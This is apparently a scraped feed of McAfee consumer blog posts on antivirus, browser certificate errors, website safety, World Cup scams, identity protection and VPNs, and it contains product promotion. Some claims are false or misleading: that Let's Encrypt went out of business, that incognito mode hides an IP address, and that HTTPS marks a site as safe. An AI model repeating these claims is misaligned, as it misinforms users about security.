With this blog, I hope to give everyone a clear definition of what antivirus does well, along with what it doesn’t do at all. The fact is that antivirus is just one form of online protection. There are other forms of protection as well, and understanding antivirus’ role in your overall mix of online protection is an important part of staying safer online. 

What is antivirus? 

Antivirus software protects your devices against malware and viruses through a combination of prevention, detection, and removal.  

For years, people have installed antivirus software on their computers. Today, it can also protect your smartphones and tablets as well. In fact, we recommend installing it on those devices as well because they’re connected, just like a computer—and any device that connects to the internet is a potential target for malware and viruses.  

In short, if it’s connected, it must get protected. 

One important distinction about antivirus is its name, a name that first came into use decades ago when viruses first appeared on the scene. (More on that in a bit.) However, antivirus protects you from more than viruses. It protects against malware too. 

Malware is an umbrella term that covers all types of malicious software regardless of its design, intent, or how its delivered. Viruses are a subset of malicious software that infects devices and then replicates itself so that it can infect yet more devices. 

So while we popularly refer to protection software as antivirus, it protects against far more than just viruses. It protects against malware overall. 

Now here’s where some confusion may come in. Some antivirus apps are standalone. They offer malware protection and that’s it. Other antivirus apps are part of comprehensive online protection software, which can include several additional far-reaching features that can protect your privacy and your identity.  

The reason why antivirus gets paired up with other apps for your privacy and identity is because antivirus alone doesn’t offer these kinds of protections. Yet when paired with things like a password manager, credit monitoring, identity theft coverage, and a VPN, to name a few, you can protect your devices—along with your privacy and identity. All the things you need to stay safer online. 

In short, antivirus doesn’t cut it alone. 

With that, let’s take a closer look at what malware and viruses really are—how they evolved, and what they look like today, along with how antivirus protects you against them. 

What was the first computer virus? 

Viruses have a long history. And depending on how you define what a virus is, the first one arguably took root in 1971—more than 50 years ago.  

It was known as Creeper, and rather than being malicious in nature, it was designed to show how a self-replicating program could identify other connected devices on a network, transfer itself to them, and find yet more devices to repeat the process. Later, the same programmer who created a follow-on version of Creeper developed Reaper, a program that could remove the Creeper program. In a way, Reaper could be considered the first piece of antivirus software. 

From there, it wasn’t until the 1980’s that malware started affecting the broader population, a time when computers became more commonplace in businesses and people’s homes.  

At first, malware typically spread by infected floppy disks, much like the “Brain” virus in 1986. While recognized today as the first large-scale computer virus, its authors say they never intended it to work that way. Rather they say they created Brain as an anti-piracy measure to protect their proprietary software from theft. However, Brain got loose. It went beyond their software and affected computers worldwide. Although not malicious or destructive in nature, Brain most certainly put the industry, businesses, and consumers on notice.  

Computer viruses became a thing. 

Another piece of malware that got passed along via floppy disks was the “PC Cyborg” attack that targeted the medical research community in and around 1989. There the malware would lie in wait until the user rebooted their computer for the 90th time. And on that 90th boot, the user was presented with a digital ransom note like the one here: 

Early example of ransomware- Source, Wikipedia
Early example of ransomware- Source, Wikipedia

Along with that note, PC Cyborg encrypted the computer’s files, which would only get unencrypted if the victim paid a fee—making PC Cyborg the first widely recognized form of ransomware. 

Shortly thereafter, the internet started connecting computers, which opened millions of doors for hackers as people went online. Among the most noteworthy was 1999’s “Melissa” virus, which spread by way of infected email attachments and overloaded hundreds of corporate and governmental email servers worldwide.  

It was quickly followed in 2000 by what’s considered the among the most damaging malware to date—ILOVEYOU, which also spread by way of an attachment, this one posing as a love letter. Specifically, it was a self-replicating worm that installed itself on the victim’s computer where it destroyed some information and stole other information, then spread to other computers. One estimate puts the global cost of ILOVEYOU at $10 billion and further speculated that it infected 10% of the world’s internet-connected computers at the time. 

Today’s malware and viruses—even more malicious today 

With the advent of the internet, malware quickly established itself as a sad fact of connected life. Today, McAfee registers an average of 1.1 million new malicious programs and potentially unwanted apps (PUA) each day, which contributes to the millions and millions of malicious programs already in existence.   

Apart from the sheer volume of malware out there today, another thing that distinguishes today’s malware from early malware attacks—they’re created largely for profit. 

We can think of it this way:  

  • Consider all the banking, shopping, and personal business you conduct on your computer, tablet, and smartphone. If a bad actor can hack into your device with malware, it may give them access to your online banking accounts, credit cards, and other financial information. 
  • Further, think of the important files you have stored on your devices. That may include tax returns, financial documentation, or payment information, which hackers can steal using malware—and then use it to commit identity theft or sell it to other bad actors on the dark web. 
  • Finally, consider the digital valuables you have stored on your devices, like photos, personal letters, music, and even games. If a hacker locks them up with a ransomware attack, you might find yourself wondering if you should take the risk of paying the ransom, even though payment is no assurance that you’ll get them back. 

Today’s malware is far more than an annoyance or headache. It can lead to follow-on attacks that target your finances, your identity, your privacy, or a mix of all three. 

How does antivirus keep you safe?  

So with a million or so new threats coming online each day, and millions more out there already, how does antivirus protect you from malware? It blocks, detects, and removes malware. And it does so in a couple of ways: 

  1. It protects you from existing threats based on an extensive list of known threats, which is updated regularly (a good reason to set your software to update automatically rather than manually). 
  2. It protects you from entirely new threats with technologies that can accurately detect those threats. Not to get overly technical about it, this entails a blend of deep learning algorithms and artificial intelligence (AI) that spots new threats identifying sketchy behavior, such as abnormal demands and instructions. In short, the best antivirus today is smart. 

However, as mentioned earlier, antivirus provides only one aspect of online protection today. While it protects your devices and the data that’s on them, your privacy and identity can come under attack as well. So while antivirus alone can protect you from malware, it can’t prevent other forms of online crime like identity theft, phishing attacks designed to steal personal information, or attacks on your accounts, to name a few of the many other types of threats out there. 

Yet comprehensive online protection can. 

Antivirus, an essential part of your overall security mix 

Comprehensive online protection software like ours offers antivirus, along with specific services and features that protect your privacy and identity online as well. It gives you dozens of other features like identity theft coverage & restoration, personal data cleanup, security freezes, and an online protection score that shows you just how safe you are, along with suggestions that can make you safer still.  

So while protecting your devices with antivirus is a great start, it’s only one part of staying safer online. Including privacy and identity protection rounds out your protection overall. 

The post What is Antivirus and What Does It Really Protect? appeared first on McAfee Blog.

]]>
“This Connection Is Not Private” – What it Means and How to Protect Your Privacy https://www.mcafee.com/blogs/privacy-identity-protection/this-connection-is-not-private-what-it-means-and-how-to-protect-your-privacy/ Tue, 22 Nov 2022 21:44:52 +0000 https://www.mcafee.com/blogs/?p=162126

Have you ever been browsing online and clicked a link or search result that took you to a site that...

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

]]>

Have you ever been browsing online and clicked a link or search result that took you to a site that triggers a “your connection is not private” or “your connection is not secureerror code? If you’re not too interested in that particular result, you may simply move on to another result option. But if you’re tempted to visit the site anyway, you should be sure you understand what the warning means, what the risks are, and how to bypass the error if you need to.   

What does “this connection is not private” mean?

A “your connection is not private” error means that your browser cannot determine with certainty that a website has safe encryption protocols in place to protect your device and data. You can bump into this error on any device connected to the internet — computer, smartphone, or tablet.  

So, what exactly is going on when you see the “this connection is not private” error?  

For starters, it’s important to know that seeing the error is just a warning, and it does not mean any of your private information is compromised. A “your connection is not privateerror means the website you were trying to visit does not have an up-to-date SSL (secure sockets layer) security certificate. 

Website owners must maintain the licensing regularly to ensure the site encryption capabilities are up to date. If the website’s SSL certificate is outdated, it means the site owners have not kept their encryption licensing current, but it doesn’t necessarily mean they are up to no good. Even major websites like LinkedIn have had momentary lapses that would throw the error. LinkedIn mistakenly let their subdomain SSL certificates lapse.  

In late 2021, a significant provider of SSL certificates, Let’s Encrypt, went out of business. When their root domain officially lapsed, it created issues for many domain names and SSL certificates owned by legitimate companies. The privacy error created problems for unwitting businesses, as many of their website visitors were rightfully concerned about site security.  

While it does not always mean a website is unsafe to browse, it should not be ignored. A secure internet connection is critical to protecting yourself online. Many nefarious websites are dangerous to visit, and this SSL certificate error will protect you from walking into them unaware.   

SSL certification standards have helped make the web a safer place to transact. It helps ensure online activities like paying bills online, ordering products, connecting to online banking, or keeping your private email accounts safe and secure. Online security continues to improve with a new Transport Layer Security (TLS) standard, which promises to be the successor protocol to SSL. 

So be careful whenever visiting sites that trigger the “connection is not private” error, as those sites can potentially make your personal data less secure and make your devices vulnerable to viruses and malware 

Note: The “your connection is not private” error is Google Chrome‘s phrasing. Microsoft Edge or Mozilla Firefox users will instead see a “your connection is not secure” error as the warning message.   

How to fix the “connection is not private” error

If you feel confident that a website or page is safe, despite the warning from your web browser, there are a few things you can do to troubleshoot the error.  

  • Refresh the page. In some cases, the error is just a momentary glitch. Try reloading the page to rule out a temporary error.  
  • Close browser and reopen. Closing and reopening your web browser might also help clear a temporary glitch.  
  • If you’re on public WiFi, think twice. Hackers often exploit public WiFi because their routers are usually not as secure or well-maintained for security. Some public WiFi networks may not have an SSL connection, or they may limit your access to websites. You can safely browse more securely in public spaces if you have an antivirus software or virtual private network (VPN) solution. 
  • Use “Incognito” mode. The most used browsers (Google Chrome browser, Mac‘s Safari, Mozilla Firefox, and Microsoft Edge) offer an “Incognito mode” that lets you browse without data collecting in your history or cache. Open the site in a new incognito window and see if the error still appears.  
  • Clear the cache on your browser. While cookies make browsing the web more convenient and personalized, they also can hold on to sensitive information. Hackers will take advantage of cached data to try and get passwords, purchase information, and anything else they can exploit. Clear browsing data before going to a site with the “connection is not secure” error to help limit available data for hackers 
  • Check the computer’s date and time. If you frequently see the “connection is not private” error, you should check and ensure your computer has the accurate time and date. Your computer’s clock can sometimes have time and date stamp issues and get glitchy in multiple ways. If it’s incorrect, adjust the date and set the time to the correct settings.  
  • Check your antivirus software. If your antivirus software is sensitive, you may have to disable it momentarily to bypass the error. Antivirus software protects you, so you should be careful to remember to turn the software back on again after you’ve bypassed the error.  
  • Be sure your browsers and operating systems are up to date. You should always keep your critical software and the operating system fully updated. An outdated browser can start getting buggy and can increase the occurrence of this kind of error.  
  • Research the website. Do a quick search for the company of the website you wish to visit and make sure they are a legitimate business. You can search for reviews, Better Business Bureau ratings, or check for forums to see if others are having the same issue. Be sure you are spelling the website address correctly and that you have the correct URL for the site. Hackers can take advantage of misspellings or alternative URLs to try and snare users looking for trusted brands. 
  • If it’s not you, it’s them. If you’ve tried all the troubleshooting techniques above and you still see the error, the problem is likely coming from the site itself. If you’re willing to take your chances (after clearing your browser’s cache), you can click the option to “proceed to the domain,” though it is not recommended. You may have to choose “advanced settings” and click again to visit the site.   

Remember, you are taking your chances anytime you ignore an error. As we mentioned, you could leave yourself vulnerable to hackers after your passwords, personal information, and other risks.  

How to protect your privacy when browsing online

Your data and private information are valuable to hackers, so they will continue to find new ways to try and procure it. Here are some ways to protect yourself and your data when browsing online.  

  • Antivirus solutions are, hands down, your best line of protection against hacking. Solutions like McAfee+ Ultimate offer all the tools you need to secure your data and devices.  
  • Use strong passwords and two-factor authentication when available. 
  • Delete unused browser extensions (or phone apps) to reduce access. 
  • Always keep your operating system and browsers up-to-date. You can open system preferences and choose to update your system automatically. 
  • Use a secure VPN solution to shield your data when browsing. 
  • Use your favorite browser’s incognito mode to reduce the data connected to your devices. 
  • Remove any 3rd party apps from your social media accounts — especially if you’ve recently taken a Facebook quiz or similar (also, don’t take Facebook quizzes). 
  • Engage the highest privacy settings in each of your browsers. 
  • Always check the address bar for HTTPS before sharing credit cards or other sensitive data on a website. 
  • Share less personal and private information on social media.  

Discover how McAfee keeps you and your data safe from threats

As we continue to do more critical business online, we must also do our best to address the risks of the internet’s many conveniences.  

A comprehensive cybersecurity tool like McAfee+ Ultimate can help protect you from online scams, identity theft, and phishing attempts, and ensure you always have a secure connection. McAfee helps keep your sensitive information out of the hands of hackers and can help you keep your digital data footprints lighter with personal data cleanup.  

With McAfee’s experts on your side, you can enjoy everything the web offers with the confidence of total protection. 

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

]]>
How to Tell Whether a Website Is Safe or Unsafe https://www.mcafee.com/blogs/internet-security/how-to-tell-whether-a-website-is-safe-or-unsafe/ Tue, 22 Nov 2022 20:49:48 +0000 https://www.mcafee.com/blogs/?p=162066

It’s important to know that not all websites are safe to visit. In fact, some sites may contain malicious software...

The post How to Tell Whether a Website Is Safe or Unsafe appeared first on McAfee Blog.

]]>

It’s important to know that not all websites are safe to visit. In fact, some sites may contain malicious software (malware) that can harm your computer or steal your personal contact information or credit card numbers.  

Phishing is another common type of web-based attack where scammers try to trick you into giving them your personal information, and you can be susceptible to this if you visit a suspicious site.  

Identity theft is a serious problem, so it’s important to protect yourself when browsing the web. Online security threats can be a big issue for internet users, especially when visiting new websites or following site links. 

So how can you tell if you’re visiting a safe website or an unsafe website? You can use a few different methods. This page discusses key things to look for in a website so you can stay safe online. 

Key signs of website safety and security

When you’re visiting a website, a few key indicators can help determine whether the site is safe. This section explores how to check the URL for two specific signs of a secure website. 

”Https:” in the website URL

“Https” in a website URL indicates that the website is safe to visit. The “s” stands for “secure,” and it means that the website uses SSL (Secure Sockets Layer) encryption to protect your information. A verified SSL certificate tells your browser that the website is secure. This is especially important when shopping online or entering personal information into a website. 

When you see “https” in a URL, the site is using a protocol that encrypts information before it’s sent from your computer to the website’s server. This helps prevent anyone from intercepting and reading your sensitive information as it’s transmitted. 

A lock icon near your browser’s URL field

The padlock icon near your browser’s URL field is another indicator that a webpage is safe to visit. This icon usually appears in the address bar and means the site uses SSL encryption. Security tools and icon and warning appearances depend on the web browser. 

Let’s explore the cybersecurity tools on the three major web browsers: 

  • Safari. In the Safari browser on a Mac, you can simply look for the lock icon next to the website’s URL in the address bar. The lock icon will be either locked or unlocked, depending on whether the site uses SSL encryption. If it’s an unsafe website, Safari generates a red-text warning in the address bar saying “Not Secure” or “Website Not Secure” when trying to enter information in fields meant for personal data or credit card numbers. Safari may also generate an on-page security warning stating, “Your connection is not private” or “Your connection is not secure.” 
  • Google Chrome. In Google Chrome, you’ll see a gray lock icon (it was green in previous Chrome versions) on the left of the URL when you’re on a site with a verified SSL certificate. Chrome has additional indicator icons, such as a lowercase “i” with a circle around it. Click this icon to read pertinent information on the site’s cybersecurity. Google Safe Browsing uses security tools to alert you when visiting an unsafe website. A red caution symbol may appear to the left of the URL saying “Not secure.” You may also see an on-page security message saying the site is unsafe due to phishing or malware. 
  • Firefox. Like Chrome, Mozilla’s Firefox browser will tag all sites without encryption with a distinctive marker. A padlock with a warning triangle indicates that the website is only partially encrypted and may not prevent cybercriminals from eavesdropping. A padlock with a red strike over it indicates an unsafe website. If you click on a field on the website, it’ll prompt you with a text warning stating, “This connection is not secure.” 

In-depth ways to check a website’s safety and security

Overall, the ”https” and the locked padlock icon are good signs that your personal data will be safe when you enter it on a website. But you can ensure a website’s security is up to par in other ways. This section will explore five in-depth methods for checking website safety. 

Use McAfee WebAdvisor

McAfee WebAdvisor is a free toolbar that helps keep you safe online. It works with your existing antivirus software to provide an extra layer of protection against online threats. WebAdvisor also blocks unsafe websites and lets you know if a site is known for phishing or other malicious activity. In addition, it can help you avoid online scams and prevent you from accidentally downloading malware. Overall, McAfee WebAdvisor is a useful tool that can help you stay safe while browsing the web. 

Website trust seals

When you’re browsing the web, it’s important to be able to trust the websites you’re visiting. One way to determine if a website is trustworthy is to look for trust seals. Trust seals are logos or badges that indicate a website is safe and secure. They usually appear on the homepage or checkout page of a website. 

There are many types of trust seals, but some of the most common include the Better Business Bureau (BBB) seal, VeriSign secure seal, and the McAfee secure seal. These seals indicate that a third-party organization has verified the website as safe and secure. 

While trust seals can help determine whether a website is trustworthy, it’s important to remember that they are not foolproof. Website owners can create a fake trust seal, so it’s always important to do your own research to ensure a website is safe before entering personal information. 

Check for a privacy policy

Another way to determine if a website is safe to visit is to check for a privacy policy. A privacy policy is a document that outlines how a website collects and uses personal information. It should also state how the site protects your data from being accessed or shared by scammers, hackers, or other unauthorized individuals. 

If a website doesn’t have a privacy policy, that’s a red flag that you shouldn’t enter any personal information on the site. Even if a website does have a privacy policy, it’s important to read it carefully so you understand how the site uses your personal data. 

Check third-party reviews

It’s important to do some preliminary research before visiting a new website, especially if you’re shopping online or entering personal data like your address, credit card, or phone number. One way to determine if a website is safe and trustworthy is to check third-party reviews. Several websites provide reviews of other websites, so you should be able to find several reviews for any given site.  

Trustpilot is one example of a website that provides reviews of other websites. 

Look for common themes when reading reviews. If most of the reviews mention that a website is safe and easy to use, it’s likely that the site is indeed safe to visit. However, if a lot of negative reviews mention problems with viruses or malware, you might want to avoid the site. 

Look over the website design

You can also analyze the website design when deciding whether a website is safe to visit. Look for spelling errors, grammatical mistakes, and anything that appears off. If a website looks like it was made in a hurry or doesn’t seem to be well-designed, that’s usually a red flag that the site might not be safe. 

Be especially careful of websites that have a lot of pop-ups. These sites are often spammy or contain malware. Don’t download anything from a website unless you’re absolutely sure it’s safe. These malicious websites rarely show up on the top of search engine results, so consider using a search engine to find what you’re looking for rather than a link that redirects you to an unknown website. 

Download McAfee WebAdvisor for free and stay safe while browsing

If you’re unsure whether a website is safe to visit, download McAfee WebAdvisor for free. McAfee WebAdvisor is a program that helps protect you from online threats, such as malware and viruses. It also blocks pop-ups and other intrusive ads so you can browse the web without worry. Plus, it’s completely free to download and use. 

Download McAfee WebAdvisor now and stay safe while browsing the web. 

The post How to Tell Whether a Website Is Safe or Unsafe appeared first on McAfee Blog.

]]>
Watch Out for These 3 World Cup Scams https://www.mcafee.com/blogs/privacy-identity-protection/watch-out-for-these-3-world-cup-scams/ Mon, 21 Nov 2022 21:29:04 +0000 https://www.mcafee.com/blogs/?p=162096

What color jersey will you be sporting this November and December? The World Cup is on its way to television...

The post Watch Out for These 3 World Cup Scams appeared first on McAfee Blog.

]]>

What color jersey will you be sporting this November and December? The World Cup is on its way to television screens around the world, and scores of fans are dreaming of cheering on their team at stadiums throughout Qatar. Meanwhile, cybercriminals are dreaming of stealing the personally identifiable information (PII) of fans seeking last-minute vacation and ticket deals. 

Don’t let the threat of phishers and online scammers dampen your team spirit this World Cup tournament. Here are three common schemes cybercriminals will likely employ and a few tips to help you dribble around their clumsy offense and protect your identity, financial information, and digital privacy. 

1. Fake Contests

Phishers will be out in full force attempting to capitalize on World Cup fever. People wrapped up in the excitement may jump on offers that any other time of the year they would treat with skepticism. For example, in years past, fake contests and travel deals inundated email inboxes across the world. Some companies do indeed run legitimate giveaways, and cybercriminals slip in their phishing attempts among them. 

If you receive an email or text saying that you’re the winner of a ticket giveaway, think back: Did you even enter a contest? If not, treat any “winner” notification with skepticism. It’s very rare for a company to automatically enter people into a drawing. Usually, companies want you to act – subscribe to a newsletter or engage with a social media post, for example – in exchange for your entry into their contest. Also, beware of emails that urge you to respond within a few hours to “claim your prize.” While it’s true that real contest winners must reply promptly, organized companies will likely give you at least a day if not longer to acknowledge receipt. 

2. Travel Scams

Traveling is rarely an inexpensive endeavor. Flights, hotels, rental cars, dining costs, and tourist attraction admission fees add up quickly. In the case of this year’s host country, Qatar, there’s an additional cost for American travelers: visas.  

If you see package travel deals to the World Cup that seem too good to pass up … pass them up. Fake ads for ultra-cheap flights, hotels, and tickets may appear not only in your email inbox but also on your social media feed. Just because it’s an ad doesn’t mean it comes from a legitimate company. Legitimate travel companies will likely have professional-looking websites with clear graphics and clean website copy. Search for the name of the organization online and see what other people have to say about the company. If no search results appear or the website looks sloppy, proceed with caution or do not approach at all. 

Regarding visas, be wary of anyone offering to help you apply for a visa. There are plenty of government-run websites that’ll walk you through the process, which isn’t difficult as long as you leave enough time for processing. Do not send your physical passport to anyone who is not a confirmed government official. 

3. Malicious Streaming Sites

Even fans who’ve given up on watching World Cup matches in person aren’t out of the path of scams. Sites claiming to have crystal clear streams of every game could be malware spreaders in disguise. Malware and ransomware targeting home computers often lurk on sketchy sites. All it takes is a click on one bad link to let a cybercriminal or a virus into your device.  

Your safest route to good-quality live game streams is through the official sites of your local broadcasting company or the official World Cup site. You may have to pay a fee, but in the grand scheme of things, that fee could be a lot less expensive than replacing or repairing an infected device. 

Shore Up Your Defense With McAfee+ 

Here’s an excellent rule to follow with any electronic correspondence: Never send anyone your passwords, routing and account number, passport information, or Social Security Number. A legitimate organization will never ask for your password, and it’s best to communicate any sensitive financial or identifiable information over the phone, not email or text as they can easily fall into the wrong hands. Also, do not wire large sums of money to someone you just met online. 

Don’t let scams ruin your enjoyment of this year’s World Cup! With these tips, you should be able to avoid the most common schemes but to boost your confidence in your online presence, consider signing up for McAfee+. Think of McAfee+ as the ultimate goalkeeper who’ll block any cybercriminals looking to score on you. With identity monitoring, credit lock, unlimited VPN and antivirus, and more, you can surf safely and with peace of mind.  

The post Watch Out for These 3 World Cup Scams appeared first on McAfee Blog.

]]>
Privacy, Identity, and Device Protection: Why You Need to Invest in All Three https://www.mcafee.com/blogs/privacy-identity-protection/privacy-identity-and-device-protection-why-you-need-to-invest-in-all-three/ Fri, 18 Nov 2022 09:13:51 +0000 https://www.mcafee.com/blogs/?p=133306

Protecting your devices with antivirus is a great start, yet it’s only one part of staying safer online. With the...

The post Privacy, Identity, and Device Protection: Why You Need to Invest in All Three appeared first on McAfee Blog.

]]>

Protecting your devices with antivirus is a great start, yet it’s only one part of staying safer online. With the way scammers and thieves target people today, you need to protect yourself too—specifically your identity and privacy. 

Threats have evolved over the years. While hackers still wage malware attacks on computers, tablets, and smartphones, the devices aren’t the ultimate target. You are. The personal and private information created and kept on your devices have tremendous value because scammers and thieves can use it to steal your identity, open credit cards in your name, and commit all kinds of identity theft and fraud. 

Yet just as using antivirus protection can keep you safer online, using privacy and identity protection will keep you far safer still. Let’s look at how all three can work in concert.   

Privacy protection  

Privacy protection focuses on keeping your information from getting into the hands of advertisers, cybercriminals, and data brokers who want to use it for their benefit. To boost your online privacy, consider a few thoughtful additions to your daily browsing, email, and social media routine.   

First, think carefully about your social media habits. Do you post everything about your day and childhood, pin your location, and share photos of documents that include your full name, birthday, or address? You may want to consider cutting back on what you broadcast on the internet, especially if your account is public for anyone to view.  

Unfortunately, while your friends and family may love your status updates, cybercriminals love them more. After only minutes of snooping, cybercriminals can glean enough personal details about you to impersonate you or target a social engineering attempt at you. To keep your private information more private, limit what you share on social media, pare down your follower and friend lists to only the closest people, and if your social media account platform supports it set your account to private.  

One more way to protect your privacy is to use a virtual private network (VPN). A VPN allows you to remain far more anonymous online by shielding your location and device information, along with the data passing along your connection—which includes things like your passwords, account information, and other sensitive info. 

A VPN offers further protection when you’re logged on to a public network, like those in coffee shops, libraries, and transportation hubs. Cybercriminals often lurk on non-password-protected Wi-Fi networks and eavesdrop on people paying bills or online shopping to steal their credentials.  

However, criminals aren’t the only ones who intrude on your privacy. Online data brokers collect thousands of data points on millions of people, then post bits of that information for anyone to see and offer far more detailed information for a price.  

Who buys this information? More legitimate purposes include people conducting background checks, journalists, law enforcement, and, largely, advertisers. With such in-depth information, advertisers can target highly specific audiences with their ads, all based on personal information that can include shopping habits from customer loyalty cards, health data from fitness apps, and information scraped from public social media posts—just to name a few of the umpteen sources they draw from. 

Yet data brokers won’t discriminate. They’ll sell to scammers and thieves as well, who can then use that personal information to help them commit identity fraud and theft. 

However, you can do something about this. Personal data cleanup can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It can also provide guidance on how you can remove your data from those sites and can even manage the removal for you. And because data brokers continually update their data, personal data cleanup will continue to monitor those sites and help you get your information removed should it crop up again. 

In all, if you feel that your privacy shouldn’t be up for grabs, a personal data cleanup service can  

Identity protection  

Another form of protection focuses on keeping you safer from identity theft and fraud. Here, thieves will steal personal and account information to rack up charges on existing credit and debit cards, open entirely new accounts and lines of credit, or impersonating the victim themselves for employment, health insurance coverage, or to commit other crimes in someone else’s name. 

A few forms of identity crime include: 

  • New account theft occurs when a criminal successfully steals personal identifiable information (PII) and financial information and uses a victim’s excellent credit score to open new credit cards, utility accounts, cellphone accounts, and so forth.  
  • Account takeover fraud involves the use of an existing debit card, credit card, or other accounts to rack up charges—which usually happens when username and password information is stolen via a phishing attack or as the result of a data breach.  
  • Synthetic identity theft is a rising form of identity crime where thieves use a core piece of PII, like a Social Security Number in the U.S., to create an entirely new identity under a false name. With this “synthetic” identity, a scammer or thief can potentially open all manner of accounts, lines of credit, and even apply for benefits.   
  • Medical identity theft happens when thieves impersonate patients to gain access to their prescription medications or have their medical treatments paid for by the identity theft victim.  
  • Business identity theft can plague businesses of all sizes. Here, scammers and thieves will attempt to open new credit lines in the business’ name or send customers phony bills and collect the payments themselves.  

This list provides just a few examples, yet in all its forms, identity crime can affect your finances, credit score, and ability to secure loans, a mortgage, or future credit cards.  

One way to keep your identity secure is to guard your PII carefully. Never give out your Social Security Number unless it’s necessary—such for employment, opening bank and credit accounts, applying for public assistance, filing tax returns, or obtaining a driver’s license. While other businesses may ask you for your Social Security Number for identification purposes, you are not legally bound to provide it. You can ask to provide an alternate form. Also, never share it over email or text where it can be potentially intercepted.  

Beyond your Social Security Number, you can take steps to protect the many other forms of personal information you have. An identity monitoring service can keep tabs on everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft.​ Likewise, credit monitoring can watch for unusual credit activity that could be an indicator of identity theft as well. ​ 

Should the unfortunate occur, identity theft & recovery coverage like ours can help you get back on track in several ways. First, it provides $1 million in identity theft coverage that covers travel expenses, legal fees, and stolen funds reimbursement. Additionally, it provides the assistance of a licensed identity theft recovery pro who can help you repair your identity and credit.  

Device security  

The third form of protection involves our devices, like computers, tablets, and phones—protecting them from both physical and digital threats. 

The first step you can take is to use a password, PIN, facial recognition, or other form of lock to keep your devices safer in the event of loss or theft. With this protection, your device is effectively an open book, providing a thief with access to all manner of personal information, accounts, and apps. 

Taking this protection a step further is learning to remotely locate your devices and then lock or wipe them. Many laptops and mobile devices offer location tracking services to help find a lost device—and yet others allow the owner to remotely lock or even wipe the contents of that device if they fear it’s lost for good or fallen into the wrong hands.  

It’s all rather straightforward, and device manufacturers have put up helpful web pages that can walk you through the process:  

Another good step you can take is to back up your files, whether with an online cloud service, a physical external drive, or both. By storing your files in the cloud, you can recover them quickly if your device is stolen and you have to remotely wipe its contents. Storing them on an external drive also lets you recover your files if your device is stolen, however, you’ll want to keep it in a secure location so that it can’t be stolen as well. Options include a fireproof safe where you keep other valuables or even a safe deposit box. The drawback is that you will have to back up files manually and regularly whereas cloud backup is practically automatic when you’re connected to the internet.   

Another component of device security is defending against malicious software. Viruses and malware can make their way onto your devices through several avenues, including sketchy websites, dishonest downloads, phishing schemes, and clicking on ads. The challenge is that several of these avenues can look rather legitimate at first glance. Sophisticated hackers, scammers, and thieves have learned how to make their bogus websites and search results look like the real thing. One way you can prevent making a bad click or downloading an attachment loaded with malware is to use web advisor software that can protect you while you browse. 

And finally, yes, antivirus is a must now just as it’s ever been. When kept up to date with the latest updates, it can prevent malware from getting onto your devices—plus scan, detect, and delete viruses and malware from your devices should they make their way onto them.  

Protecting your privacy, identity, and devices—today calls for all three 

The threats out there are many, and they go beyond threats to your devices. Hackers, scammers, and thieves are quite interested in you. Your accounts, your personal information, and anything they can grab to commit theft or fraud. Protecting yourself today calls for not only protecting your devices but your privacy and identity too. 

Comprehensive online protection software like ours covers all three—privacy, identity, and devices. It includes the protections mentioned above, plus dozens of features more such as ransomware coverage, credit freezes, security locks, and an online protection score that shows you just how safe you are, along with suggestions that can make you safer still.  

In all, it gives you far more control over your privacy and personal information, control that should rest in your hands, and not in the hands of data brokers, hackers, scammers, and thieves. 

The post Privacy, Identity, and Device Protection: Why You Need to Invest in All Three appeared first on McAfee Blog.

]]>
Why Everyone Needs a VPN https://www.mcafee.com/blogs/privacy-identity-protection/why-everyone-needs-a-vpn/ Thu, 17 Nov 2022 14:21:05 +0000 https://www.mcafee.com/blogs/?p=136546

You may hear corporate cybersecurity experts hail the benefits of a VPN, or a virtual private network, to keep company...

The post Why Everyone Needs a VPN appeared first on McAfee Blog.

]]>

You may hear corporate cybersecurity experts hail the benefits of a VPN, or a virtual private network, to keep company information safe from ransomware attacks and cybercriminals seeking to steal valuable business secrets. It’s unlikely that everyday people, such as yourself, will be targeted by a ransomware scheme, so you may be puzzled about how a VPN can help someone like you be safer online. Luckily, with a VPN being very easy to install and use, you can indeed experience these three everyday benefits to keep your browsing activities safe from eavesdroppers seeking to profit from your online comings and goings. 

1. Stay Safe on Unsecure Networks

The most widely known benefit of a VPN for daily use is to safeguard your device when it’s connected to a public Wi-Fi network. Coffee shops, libraries, hotels, transportation hubs, and other public places often provide courtesy internet service to visitors. Shifty characters often lurk on unprotected networks to lift personally identifiable information (PII) from people handling sensitive emails, making banking transactions, or shopping online. Public Wi-Fi eavesdroppers can lift credit card numbers, addresses, birthdays, and Social Insurance Numbers. 

When you connect to public Wi-Fi that doesn’t have a lock icon, that’s a sign that you should toggle on your VPN. Also, even if you’re required to enter a password, be wary of any network you share with strangers.  

2. Hide Location Data

A VPN can also hide your location data. How does this help you protect your browsing history? First, when you scramble your location, you’re likely to confuse ad networks trying to send you targeted ads. This will free your social media feeds and search engines from targeted ads that often are so accurate they seem like an invasion of privacy. 

Second, hiding your location can protect you from cybercriminals looking to mine PII. VPNs make it impossible for criminals to discover your IP address. (The internet protocol address is what ties your device to a specific local network.) When they’re visible, criminals can trace IP addresses to reveal home addresses, full names, and phone numbers: all of which are key pieces of PII that, in the wrong hands, can jeopardize your identity.  

3. Restrict Data Snooping and Sharing 

While Canada and the European Union don’t allow ISPs (internet service providers) to even collect the browsing data of their customers, keep in mind that in some countries, like the U.S., ISPs can collect, store, share, and/or sell customer data. While advertisers are often the buyers of customer data, in the case of a breach, the more places your PII lives, the more likely it may be involved in a security incident. The goal is to limit the extent and number of places where your browsing history is stored. 

VPNs can scramble your online movements to the point where not even ISPs can track it. Plus, when you log out, your device doesn’t keep a record of what you did while connected to the VPN. Incognito mode on your internet browser hides your IP address, but the websites you visit still collect cookies and store data about your online whereabouts, meaning that it’s not truly private browsing. 

Protect Your Privacy With McAfee 

McAfee Safe Connect VPN encrypts your online activity to protect your data from prying eyes. With a premium paid plan, you can protect up to five devices at once with bank-grade Wi-Fi encryption. Feel more confident whenever you hop on the internet across all your connected devices with just one quick and easy step. 

The post Why Everyone Needs a VPN appeared first on McAfee Blog.

]]>
Everything You Need to Know to Avoid a Man-in-the-Middle Mobile Attack https://www.mcafee.com/blogs/mobile-security/everything-you-need-to-know-to-avoid-a-man-in-the-middle-mobile-attack/ Wed, 16 Nov 2022 20:07:48 +0000 https://www.mcafee.com/blogs/?p=161856

Monkey in the middle, the beloved playground staple, extends beyond schoolyards into corporate networks, home desktops, and personal mobile devices...

